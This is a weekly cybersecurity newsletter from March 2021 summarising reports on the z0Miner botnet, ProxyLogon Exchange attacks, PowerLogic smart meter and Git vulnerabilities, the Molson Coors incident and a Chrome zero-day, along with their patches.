Cyber Pulse: Edition 147 | 16 March 2021

Here is our cyber security news round-up of the week:

Crypto-mining botnet targets unpatched vulnerabilities in cloud servers

Attackers often keep upgrading their tools to scan for and infect new devices by exploiting unpatched vulnerabilities. Recently, the z0Miner cryptomining malware was spotted probing cloud servers by exploiting a new set of unpatched vulnerabilities. The botnet was using exploits targeting an ElasticSearch RCE vulnerability (CVE-2015-1427) and an older RCE, impacting Jenkins servers.

After compromising a server, the malware will first download a malicious shell script and set up a new cron entry to periodically grab and execute malicious scripts from Pastebin. The botnet downloads a mining kit containing an XMRig miner script (java.exe), a config file (config.json), and a starter script (solr.sh). It starts to mine for Monero (XMR) cryptocurrency in the background.

According to the Tencent Security Team, z0Miner was actively exploiting two Weblogic pre-auth RCE bugs tracked as CVE-2020-14882 and CVE-2020-14883 to spread to other devices. In addition, the botnet was seen spreading laterally on the network of already compromised devices via SSH.

Continued exploitation of Microsoft Exchange Servers

A bug referred to as ProxyLogon was one of four Microsoft Exchange zero-days that Microsoft patched in an out-of-band release on 3 March 2021. It's part of the Hafnium attack, and sysadmins are advised to upgrade on-prem and hosted Exchange deployments, per Microsoft's advice, and also to run Microsoft Safety Scanner, a Microsoft malware discovery tool.

Since Microsoft disclosed ongoing attacks using ProxyLogon exploits last week, at least ten APT groups have been spotted by Slovak internet security firm ESET targeting unpatched Exchange servers. They also detected the deployment of PowerShell downloaders on multiple email servers via attack infrastructure previously linked to the DLTMiner coin-mining campaign.

A (mostly) working ProxyLogon proof-of-concept exploit was shared earlier this week (and later removed) by a security researcher. According to Palo Alto Networks's telemetry data, more than 125,000 Exchange Servers still wait to be patched worldwide. Tens of thousands of organisations have already been compromised following ongoing attacks exploiting the ProxyLogon flaws since at least January, two months before Microsoft started releasing patches. These vulnerabilities are tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065.

Schneider PowerLogic smart meters vulnerable

Industrial cybersecurity firm Claroty this week disclosed technical details for two potentially serious vulnerabilities affecting PowerLogic smart meters made by Schneider Electric. PowerLogic is a line of revenue and power quality meters that are used not only by utilities, but also industrial companies, healthcare organisations and data centers for monitoring electrical networks. Researchers at Claroty discovered that some of the PowerLogic ION and PM series smart meters are affected by vulnerabilities that can be exploited remotely by an unauthenticated attacker by sending specially crafted TCP packets to the targeted device.

“These smart meters communicate using a proprietary ION protocol over TCP port 7700, and packets received by the device are parsed by a state machine function,” Claroty explained in a blog post. “We found that it is possible to trigger the flaw during the packet-parsing process by the main state machine function by sending a crafted request. This can be done without authentication because the request is fully parsed before it is handled or authentication is checked.”

Claroty said its researchers identified two different exploitation paths – depending on the architecture of the targeted device – and two different CVE identifiers have been assigned. One of them, CVE-2021-22714, is considered critical as it allows an attacker to cause the targeted meter to reboot (i.e. DoS condition) and possibly even to execute arbitrary code. The other one, CVE-2021-22713, can only be exploited to force the device to reboot and it has been assigned a high severity rating. Users of the affected Schneider Electric products should apply the patches or mitigations to prevent potential attacks, particularly since information about the flaws has been made public.

Git vulnerability could enable remote code execution attacks during clone process

The Git Project has patched a vulnerability that could result in remote code execution. The bug – tracked as CVE-2021-21300 – is present in several versions of the open source code management system, and could allow a hostile remote repository to execute code locally during a clone operation. Crucially, the vulnerability only affects users with case-insensitive filesystems that enable support for symbolic links. Files using a clean/smudge filter such as Git LFS must also be enabled for the attack to work.

A security advisory reads: “In affected versions of Git, a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS).

The release fixes the bug in versions 2.17.6 through to 2.30.2. Git users often clone an existing repository for various reasons, such as building on a fully-fledged copy from elsewhere or keeping a copy of their project in case the server disk is corrupted. Since the RCE vulnerability only affects case insensitive filesystems, not all Git users are vulnerable to exploitation. Other operating systems such as Linux – which is case sensitive by default – are presumed to be safe, however users should still heed caution.

Molson Coors Brewery crippled by cyber attack

A cyber attack took place at Molson Coors breweries based in the US, leaving the brewery unable to produce beer at this time. Molson Coors has a huge portfolio of beer brands, including the well-known Coors and Miller brands, but also Molson Canadian, Blue Moon, Peroni, Grolsch, Killian’s, and Foster’s. The representatives of Molson Coors gave just a few details, but cybersecurity experts say this type of attack is becoming all too familiar. The company acknowledges “a systems outage” caused by a “cybersecurity incident” that caused delays or disruptions to brewery operations, production and shipments.

“The Company is working around the clock to get its systems back up as quickly as possible,” Miller Coors wrote in the filing. “Although the Company is actively managing this cybersecurity incident, it has caused and may continue to cause a delay or disruption to parts of the Company’s business, including its brewery operations, production, and shipments.”

So far, the hack seems to be a ransomware attack. Cybersecurity experts are urging the companies to back up their data on actual hard drives, so when a situation of this type presents itself they won’t be victims of ransomware.

Google fixes the third actively exploited Chrome zero-day since January

Google has addressed and fixed a new actively exploited zero-day flaw in its Chrome browser that has been actively exploited in the wild, the second one within a month. The flaw, tracked as CVE-2021-21193, is a use after free vulnerability in the Blink rendering engine. Google addressed the issue with the 89.0.4389.90 version for Windows, Mac and Linux, which will be available in the coming days. The flaw was reported to Google by an anonymous researcher on 9 March, at the time of this writing the company did not reveal details about the vulnerability to avoid those other threat actors could exploit the issue in the wild.

This update includes 5 security fixes that were contributed by external researchers. In early February, Google addressed an actively exploited zero-day vulnerability, tracked as CVE-2021-21148, with the release of the Chrome 88.0.4324.150 version. The vulnerability is a Heap buffer overflow that resides in the V8, which is an open-source high-performance JavaScript and WebAssembly engine, written in C++.

Edited and compiled by QA's Director of Cyber, Richard Beck.

Subscribe to our weekly Cyber Pulse newsletter Find out about QA's extensive cyber-security courses